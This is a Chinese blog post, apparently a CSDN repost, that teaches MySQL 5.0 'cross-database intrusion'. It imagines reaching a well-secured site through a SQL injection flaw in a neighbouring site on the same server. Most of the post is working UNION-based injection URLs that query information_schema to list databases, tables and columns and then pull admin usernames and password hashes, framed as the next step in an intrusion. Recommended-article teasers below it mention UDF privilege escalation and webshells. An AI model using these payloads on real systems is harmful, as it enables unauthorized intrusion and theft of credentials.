mysql 5.0 入侵_Mysql跨库入侵介绍

最新推荐文章于 2021-01-30 20:33:49 发布
最新推荐文章于 2021-01-30 20:33:49 发布
阅读量155 收藏
点赞数
文章标签: mysql 5.0 入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42536863/article/details/113419815
版权

入侵假想: 目标是A站点,安全性比较可以。但是在同服务器下的B站点,我们发现了一个Mysql 注入点,并且还有查询相关库的权限。

那么,我们就可以通过B站点的注入点跨库查询A站点的信息,入侵之….. (当然你也可以把B站点入侵了,再入侵A。但不是有注入点就可以入侵的,偶?跑题了。)

大家知道在mysql5.0以后加入了 information_schemata 这个虚拟库,

基本结构如下:

Information_schema-------| Schemata 存放数据库信息的表 | Tables 存放数据库中表信息的表 | Columns 存放数据库中列信息的表 …………………………………..

对我们入侵十分有帮助。既然我们要跨库,就需要查询库信息。

怎么查?上图,来得直接 还有一个要介绍的,假如我们要查询mysql库中的user表中的相关信息,

我们可以这样查: 好了,XX们已经等不急了。

B站注入点: http://www.b.com/b.php?ID=99 看看数据库基本情况 http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,concat(user(),0x2c,version()) 5.x的mysql,挺好的。

继续 查库: http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,schema_name/**/from/**/information_schema.schemata/**/limit/**/0,1 这样查出来的就是mysql中的第一个数据库,想要查第二个数据库就将limit 0,1改为limit 1,1 以此类推。

有人就要问了,你怎么知道A站点的数据库是哪个呀?这个嘛,1.Load_file,要看运气 2.猜猜,还可以看A站是不是整站程序,凭经验猜猜,像helen这样的牛B社工猜出来没问题。

通过上面的操作,我们已经获取了A站点的数据库名 adb(假设) 查管理员表: http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,table_name/**/from/**/information_schema.tables/**/where/**/table_schema=0x616462/**/limit/**/0,1、 ……… 得到管理员表为 adb_admin 查管理员中表的字段: http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,column_name/**/from/**/information_schema.columns/**/where/**/table_name=0x6164625F61646D696E/**/limit/**/0,1 ……………. 得到管理员表字段为 admin_name admin_pass 查管理员帐号信息: http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,concat(admin_name,0x2c,admin_pass)/**/from/**/adb.adb_admin/**/limit/**/0,1 ………………… OK到这里A站点的管理员信息也就查询出来了,XX们,继续入侵工作 注: adb的Hex为0x616462 adb_admin的Hex为0x6164625F61646D696E , 的Hex为0x2c

复制验证码
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 入侵_mysql5.0入侵测试以及防范方法分享
weixin_36349685的博客
01-18 205
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:grant all privileges on *.* to 数据库账...
如何入侵mysql数据库_如何创建数据库,如何利用弱口令入侵MySQL数据库
weixin_39770416的博客
01-19 413
导航:网站首页 >如何创建数据库,如何利用弱口令入侵MySQL数据库时间:2018-3-9相关问题:匿名网友:很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDFDLL中自写的Fu...
mysql入侵服务器_记通过mysql数据库成功入侵到服务器内部的渗透实战
weixin_33127399的博客
01-19 1207
1,在成功进入mysql到数据库之后,可以使用select user();命令,查看当前的用户,如果为root,则可以执行下一步操作。不为root,则需要通过其他方法提权。2, 使用show variables like '%log%'及show variables like '%secure%'查看相应的日志模块和安全防御模块的开启情况。并且了解网站目录的相应的路径情况,如果没有开启,则使用下面...
教你一些MySQL数据库入侵及防御方法
老班长的博客
09-05 5773
一、MySQL 信息收集 1、端口信息收集 MySQL 默认端口是 3306 端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: d47e62d2b349aca45e42305ed6714efbe5ed61d9iisputter,直接填写 3306 端口,IP 地址填写单个或者 C 段地址; d47e62d2b349aca45e42305ed6714efbe5ed...
通过mysql命令 入侵_通过mysql入侵全过程.doc
weixin_29322049的博客
01-19 323
您所在位置:网站首页 > 海量文档&nbsp>&nbsp计算机&nbsp>&nbspPHP资料通过mysql入侵全过程.doc7页本文档一共被下载:次,您可全文免费在线阅读后下载本文档。 下载提示1.本站不保证该用户上传的文档完整性,不预览、不比对内容而直接下载产生的反悔问题本站不予受理。2.该文档所得收入(下载+...
MySQL_5.0_Reference_Manual.rar_MySQL 5.0 Manu_mysql 5.0_mysql5.0
09-24
该文档的MySQL 5.05.0.64版本MySQL是一个开放源码的小型关系数据库管理系统,开发者为瑞典MySQL AB公司。目前MySQL被广泛地应用在Internet上的中小型网站中。由于其体积小、速度快、总体拥有成本低,尤其是开放...
mysql5.0入侵测试以及防范方法分享
09-10
本文将详细介绍 MySQL 5.0 入侵测试的方法和防范方法。 一、MySQL 5.0 入侵测试 MySQL 5.0 入侵测试的主要目的是尝试访问和控制 MySQL 服务器。攻击者可以使用各种方法来入侵 MySQL 服务器,例如使用弱密码、SQL ...
7.MySQL库文件_MYSQL5.0VC调用库文件_mysql文件_
10-01
MySQL是一种广泛使用的开源关系型数据库管理系统,其5.0版本是历史上的一个重要里程碑,提供了许多增强功能和性能优化。在Windows环境下,如果你使用Visual C++(VC)进行开发,并需要与MySQL数据库进行交互,你就...
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
本压缩包"MYSQL_UDF-5.0.rar"包含了关于MySQL UDF的资源,特别是针对版本5.0的相关内容。 在MySQL中,UDF可以分为几种类型,包括标量函数、聚合函数和表值函数。标量函数返回单个值,如数学运算或字符串操作;聚合...
mysql-manager.zip_mysql manager 5.0
09-19
MySQL Manager 5.0 是一款专为MySQL数据库管理系统设计的工具,它提供了用户友好的图形界面,便于管理和操作MySQL数据库。这款软件是基于MySQL 5.0版本开发的,因此与该版本的数据库服务器有着最佳的兼容性和性能...
mysql 数据库被入侵解决办法
z1012890225的专栏
10-17 5512
系统上线后,mysql经常报这个问题 Caused by: com.mysql.jdbc.PacketTooBigException: Packet for query is too large (2051 > 1024). You can change this value on the server by setting the max_allowed_packet' variabl...
注入mysql跨库查询_技巧篇:mysql远程跨库查询小结
weixin_32060671的博客
01-18 381
使用场景,举例说明:我有两台阿里云的ecs服务器,IP分别是:xxx.xxx.xxx.1,xxx.xxx.xxx.2数据库分别是:IP为1的db1,IP为2的db2db1中有张表sys_user:建表SQL如下:CREATE TABLE `sys_user` (`id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '编号',`username` varch...
记一次基于mysql入侵Simple
柳似烟的专栏
08-18 559
一切从MS15-034/CVE-2015-1635漏洞开始 通过nmap扫描发现内网中的一台机器存在漏洞CVE-2015-1635 于是发起一次BSOD的攻击 So it’s just BSOD and reboot!除了这些,还能做些什么呢?接着发现其mysql数据库存在弱口令,于是登进去看了看,发现没什么可看的,不看了,增加一个用户先! 试试mysql的文件操作命令dumpfil
Mysql被黑客入侵及安全措施总结
lovemysea的专栏
03-06 3241
情况概述今天登陆在腾讯云服务器上搭建的Mysql数据库,发现数据库被黑了,黑客提示十分明显。Mysql中只剩下两个数据库,一个是information_schema,另一个是黑客创建的PLEASE_READ,其中有一张info表,内容如下:Info: Your DB is Backed up at our servers, to restore send 0.2 BTC to the Bitcoi...
端口入侵mysql_看紧你的3306端口,一次通过mysql入侵数据库教程 -电脑资料
weixin_30118919的博客
01-30 2868
mysql用superscan扫了一下某个c类的网段,寻找开放80端口的机器,结果就只有一台机器开放了80端口,试着连了一下,是我们学校某个社团的的主页,从端口的banner来看应该是apache(win32),证实一下telnet 211.87.xxx.xxxget(回车)501 MethodNot ImplementedMethod Not Implementedget to /index.h...
利用Mysql root帐号获取某Linux操作系统网站webshell
weixin_44023460的博客
12-08 2527
利用Mysql root帐号获取某Linux操作系统网站webshell simeon 获取Webshell,网上有很多文章,本文是phpMyAdmin漏洞利用与防范专题中的一个研究课题,其主要环境是在有Mysql数据库root帐号密码权限的基础下,如何通过技术手段获取Linux操作系统上建立的网站系统的webshell权限。 1.漏洞利用思路 1.1Mysql root帐号密码获取思路 (1)通...
mysql注入大全_mysql注入大全及防御
weixin_30119911的博客
01-19 448
0.明白存在的位置:get型 post型 cookie型 http头注入1.先测试注入点,注册框、搜索框、地址栏啥的,判断是字符型,搜索型还是数字型字符型 1' and '1'='1 成功,1' and '1'='2 报错 1成功,1'报错 注意闭合万能密码:1' or ’1‘=’1 #数字型去掉'同理搜索型 select password from users where user l...
solr5.0mysql_Apache Solr 安装部署及索引创建
最新发布
06-10
好的,我可以为您介绍一下Solr 5.0MySQL的整合,以及Solr的安装和索引创建。 首先,您需要下载Solr 5.0,Solr是一个开源搜索平台,可以帮助您创建强大的搜索应用程序。Solr可以运行在独立模式或分布式模式下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值